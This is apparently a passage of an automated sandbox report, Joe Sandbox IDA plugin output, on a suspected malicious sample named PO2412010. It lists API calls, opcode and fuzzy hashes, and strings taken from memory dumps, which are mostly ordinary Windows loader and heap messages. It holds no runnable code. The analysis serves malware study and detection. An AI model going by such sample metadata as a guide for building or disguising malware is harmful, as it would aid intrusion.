                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: wdA
                                                                        • API String ID: 3298025750-2931128418
                                                                        • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                        • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                                        • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                        • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                                        • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                        • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                                        • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                        • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 386 1ac2c0a-1ac2c0f 387 1ac2c1f-1ac2c26 LdrInitializeThunk 386->387 388 1ac2c11-1ac2c18 386->388
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 850272f1b2b1cf949c872599a0b3b8ce22e8b528c13ecaa748585ab4aa3fb0fd
                                                                        • Instruction ID: 9a3b235e101fa9c355701eeab278391c3b975c4c8d64c7f5485592e831ed2eb5
                                                                        • Opcode Fuzzy Hash: 850272f1b2b1cf949c872599a0b3b8ce22e8b528c13ecaa748585ab4aa3fb0fd
                                                                        • Instruction Fuzzy Hash: B3B09B719059D5C5DA11E7644608717791077D0701F16C076D2030642F473CC5D1E276
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: 2ecea04537cefeded93556a4982283a87fc34e592c3a230d589face84ec02880
                                                                        • Instruction ID: 8263fc9fdcab055fd5a4b6f33c098be4508ce4eb2a0781a16d51e9c3e7e88f4a
                                                                        • Opcode Fuzzy Hash: 2ecea04537cefeded93556a4982283a87fc34e592c3a230d589face84ec02880
                                                                        • Instruction Fuzzy Hash: B2928F71604742AFE72ADE19C884B6BBBE8FF84750F04499DFA94D7290D770D848CB52
                                                                        Strings
                                                                        • Thread identifier, xrefs: 01AF553A
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01AF5543
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AF540A, 01AF5496, 01AF5519
                                                                        • Invalid debug info address of this critical section, xrefs: 01AF54B6
                                                                        • Address of the debug info found in the active list., xrefs: 01AF54AE, 01AF54FA
                                                                        • undeleted critical section in freed memory, xrefs: 01AF542B
                                                                        • Critical section debug info address, xrefs: 01AF541F, 01AF552E
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AF54CE
                                                                        • corrupted critical section, xrefs: 01AF54C2
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AF54E2
                                                                        • Critical section address, xrefs: 01AF5425, 01AF54BC, 01AF5534
                                                                        • 8, xrefs: 01AF52E3
                                                                        • double initialized or corrupted critical section, xrefs: 01AF5508
                                                                        • Critical section address., xrefs: 01AF5502
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: 1a19d311f4ccbf539c45b58f945e5bcc7250c5d66f95a473ba35febcabbaa239
                                                                        • Instruction ID: 1075d801346409c81a1ad3a5c65c77adae7043d91b6587e98f943620b9222103
                                                                        • Opcode Fuzzy Hash: 1a19d311f4ccbf539c45b58f945e5bcc7250c5d66f95a473ba35febcabbaa239
                                                                        • Instruction Fuzzy Hash: A5816AB1E40348AFDB24CF99C945BAEBBB9FB08714F14411EF614B7291D375A940CB60
                                                                        Strings
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AF2498
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AF22E4
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AF2412
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AF25EB
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AF2409
                                                                        • @, xrefs: 01AF259B
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AF24C0
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AF2602
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 01AF261F
                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AF2624
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AF2506
                                                                        Strings
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                        Strings
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        Strings
                                                                        • VerifierDebug, xrefs: 01B08CA5
                                                                        • VerifierDlls, xrefs: 01B08CBD
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B08A67
                                                                        • HandleTraces, xrefs: 01B08C8F
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B08A3D
                                                                        • VerifierFlags, xrefs: 01B08C50
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01B08B8F
                                                                        Strings
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                        Strings
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        • LdrpInitShimEngine, xrefs: 01AD99F4, 01AD9A07, 01AD9A30
                                                                        • apphelp.dll, xrefs: 01A76496
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AD9A11, 01AD9A3A
                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AD9A01
                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AD99ED
                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AD9A2A
                                                                        Strings
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01AF8170
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01ABC6C3
                                                                        • LdrpInitializeImportRedirection, xrefs: 01AF8177, 01AF81EB
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01AF81E5
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01AF8181, 01AF81F5
                                                                        • LdrpInitializeProcess, xrefs: 01ABC6C4
                                                                        Strings
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01AF2160, 01AF219A, 01AF21BA
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AF2180
                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AF2165
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AF2178
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AF21BF
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AF219F
                                                                        APIs
                                                                          • Part of subcall function 01AC2DF0: LdrInitializeThunk.NTDLL ref: 01AC2DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC0D74
                                                                        Strings
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AB8421
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AB855E
                                                                        • @, xrefs: 01AB8591
                                                                        • LdrpInitializeProcess, xrefs: 01AB8422
                                                                        Strings
                                                                        • .Local, xrefs: 01AB28D8
                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AF21DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AF22B6
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AF21D9, 01AF22B1
                                                                        Strings
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AF3456
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AF342A
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AF3437
                                                                        • RtlDeactivateActivationContext, xrefs: 01AF3425, 01AF3432, 01AF3451
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AE10AE
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AE106B
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AE0FE5
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AE1028
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        Strings
                                                                        • LdrpDynamicShimModule, xrefs: 01AEA998
                                                                        • apphelp.dll, xrefs: 01AA2462
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AEA9A2
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01AEA992
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        • HEAP[%wZ]: , xrefs: 01A93255
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A9327D
                                                                        • HEAP: , xrefs: 01A93264
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AEA121
                                                                        • LdrpCheckModule, xrefs: 01AEA117
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 01AEA10F
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        Strings
                                                                        • Failed to reallocate the system dirs string !, xrefs: 01AF82D7
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AF82E8
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 01AF82DE
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        • PreferredUILanguages, xrefs: 01B3C212
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B3C1C5
                                                                        • @, xrefs: 01B3C1F1
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        Strings
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B04888
                                                                        • LdrpCheckRedirection, xrefs: 01B0488F
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01B04899
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        Strings
                                                                        • LdrpInitializationFailure, xrefs: 01B020FA
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01B02104
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 01B020F3
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        Strings
                                                                        • LdrResSearchResource Enter, xrefs: 01A8AA13
                                                                        • LdrResSearchResource Exit, xrefs: 01A8AA25
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A8063D
                                                                        • kLsE, xrefs: 01A80540
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 01A8A309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 01A8A2FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B0895E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction ID: b95c82680ea083cc4c26bcb44986108227589e0a9896b520063fb0ff68bd9d24
                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction Fuzzy Hash: ADF14F71E0021A9BDF15CFA9D594BAEBBF5AF48710F498129E905EB340E774EC41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e90baea0f4a0749be439b54911759f205a06077e6e2fad85848a4ef170b43116
                                                                        • Instruction ID: 4342b0cd3c84bd178f3aa0359b64846233e14383cc711d517844354fca8f1e78
                                                                        • Opcode Fuzzy Hash: e90baea0f4a0749be439b54911759f205a06077e6e2fad85848a4ef170b43116
                                                                        • Instruction Fuzzy Hash: 9ED1F272A0060A8BDF09CF59C841AFEB7F2FF88304F9A81A9D955E7245D735E9058B60
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8449a1c36694c7058edb59d202a611b1964f2a0187497780672e9bf22b310165
                                                                        • Instruction ID: 24c7c6bd51f73997ca101022da3ec4884672dedafefaf7722ae0748e2adc3d89
                                                                        • Opcode Fuzzy Hash: 8449a1c36694c7058edb59d202a611b1964f2a0187497780672e9bf22b310165
                                                                        • Instruction Fuzzy Hash: 4EE1B171508342CFD715EF28C590A6ABBF0FF88314F05896DE9998B351EB31E905CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22fb55ad865dc3c924a33eac345e1e5b6cc3f082fbdb1e5494d293410290063b
                                                                        • Instruction ID: d48d27048c69a50496687c31be2aecfd011130dcc5c588064ad194328d02eb4e
                                                                        • Opcode Fuzzy Hash: 22fb55ad865dc3c924a33eac345e1e5b6cc3f082fbdb1e5494d293410290063b
